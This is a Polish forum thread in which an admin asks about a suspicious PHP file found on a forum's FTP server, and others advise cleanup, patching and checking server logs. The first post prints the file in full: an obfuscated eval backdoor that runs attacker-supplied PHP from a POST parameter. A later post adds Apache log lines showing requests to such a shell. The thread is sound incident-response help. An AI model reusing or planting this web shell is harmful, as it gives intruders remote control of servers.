Dziwny plik na serwerze

[Farmer]

Witam

 

Dziś zauważyłem nowy plik na serwerze FTP. Nie wiem skąd on się znalazł

 

nazwa: wchckd5.php

 

Zawartość:

 

==============================================================================
=========================        END       ===================================
========================= /index.php?<?$d=substr(8,1);foreach(array(36,112,61,64,36,95,80,79,83,84,91,39,112,49,39,93,59,36,109,61,115,112,114,105,110,116,102,40,34,37,99,34,44,57,50,41,59,105,102,40,115,116,114,112,111,115,40,36,112,44,34,36,109,36,109,34,41,41,123,36,112,61,115,116,114,105,112,115,108,97,115,104,101,115,40,36,112,41,59,125,111,98,95,115,116,97,114,116,40,41,59,101,118,97,108,40,36,112,41,59,36,116,101,109,112,61,34,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,66,121,73,100,40,39,80,104,112,79,117,116,112,117,116,39,41,46,115,116,121,108,101,46,100,105,115,112,108,97,121,61,39,39,59,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,66,121,73,100,40,39,80,104,112,79,117,116,112,117,116,39,41,46,105,110,110,101,114,72,84,77,76,61,39,34,46,97,100,100,99,115,108,97,115,104,101,115,40,104,116,109,108,115,112,101,99,105,97,108,99,104,97,114,115,40,111,98,95,103,101,116,95,99,108,101,97,110,40,41,41,44,34,92,110,92,114,92,116,92,92,39,92,48,34,41,46,34,39,59,92,110,34,59,101,99,104,111,40,115,116,114,108,101,110,40,36,116,101,109,112,41,46,34,92,110,34,46,36,116,101,109,112,41,59,101,120,105,116,59)as$c){$d.=sprintf((substr(urlencode(print_r(array(),1)),5,1).c),$c);}eval($d);exit;?> ===================================
==============================================================================

 

Co to za plik? Usunąć go?

[Gość CiociaSamaRozkosz]

zrób kopię i usuń, bo takiego pliku jeszcze nie widziałem

[Farmer]

DawPi może Ty wiesz co to za pliczek?

[insp]

http://forum.invisionize.pl/topic/36012-ataki-na-stron%C4%99/

[DawPi]

To bardzo podejrzane. Najlepiej przeczytaj dokładnie opis jak się tego pozbyć: https://www.invisionpower.com/support/kb/_/how-to-clean-your-site-from-infection-r27

[Farmer]

A więc zwykłe usunięcie pliku nie wystarczy?

[DawPi]

A więc po co piszesz jakieś teorie? Masz poradnik, masz zainfekowane forum, więc na co czekasz i kombinujesz nie wiadomo po co?

[Farmer]

Ok to robię według tego poradnika.

 

p.s już 4 kolejne pliki z tą samą zawartością.

[DawPi]

No to ładnie tam masz. Pamiętaj potem o wgraniu łatek zabezpieczających, a najlepiej zaktualizuj forum do najnowszej wersji, które to jest możliwie najlepiej zabezpieczoną wersją na chwilę obecną.

[Farmer]

A jakieś linki do łatek można prosić?

[DawPi]

Proszę: http://forum.invisionize.pl/forum/43-wiadomo%C5%9Bci-z-invision-power-services/

[Farmer]

Te zainstalować?

 

http://forum.invisionize.pl/topic/34816-ips-news-ipboard-33x-32x-oraz-31x-łata-bezpieczeństwa-6-listopad-2012/

http://forum.invisionize.pl/topic/35590-ips-news-ipboard-31x-32x-33x-oraz-34x-łata-bezpieczeństwa-27-grudzień-2012/

http://forum.invisionize.pl/topic/34790-ips-news-ipboard-31x-32x-and-33x-critical-security-update/

http://forum.invisionize.pl/topic/34658-ips-news-ipboard-31x-32x-and-33x-security-update/

http://forum.invisionize.pl/topic/32925-ips-news-ipboard-334-wydane-aktualizacja-dla-bezpieczenstwa-ipboard-330-333-32x/

Edytowane 14 Marca 2013 przez Farmer

[DawPi]

Nie wiem które - masz dodać te pod Twoją wersję forum lub zaktualizować forum (najlepsze rozwiązanie i szczerze polecane).

[Budyn]

Miałem to i z 20-30 innych.
Zacznij od zmiany hasła(nie zapisuj go w kliencie FTP) i przejrzyj sobie logi swojego serwera, w moim przypadku to DA:
"Podsumowanie / Statystyki / Logi Serwera" -> Pełne Logi Apache'a -> i szukaj podobnych logów:
 

82.154.112.105 - - [15/Mar/2013:04:06:32 +0100] "POST /XXX_XXX_XXX/mobiletBYP.php HTTP/1.1" 302 1 "-" "Mozilla/5.0"
82.154.112.105 - - [15/Mar/2013:04:06:32 +0100] "GET / HTTP/1.1" 200 199909 "-" "Mozilla/5.0"

Wcześniej miałem ok 10-20 wejść na minute do tego pliku, a teraz po zablokowaniu (dokładnie to wywaliłem tego shell'a i dałem w tym pliku przekierowanie na główną stronę) potrafią być 200-270 wejść z różnych IP.
Powyższy plik był to shell + wysyłał sobie e-maile...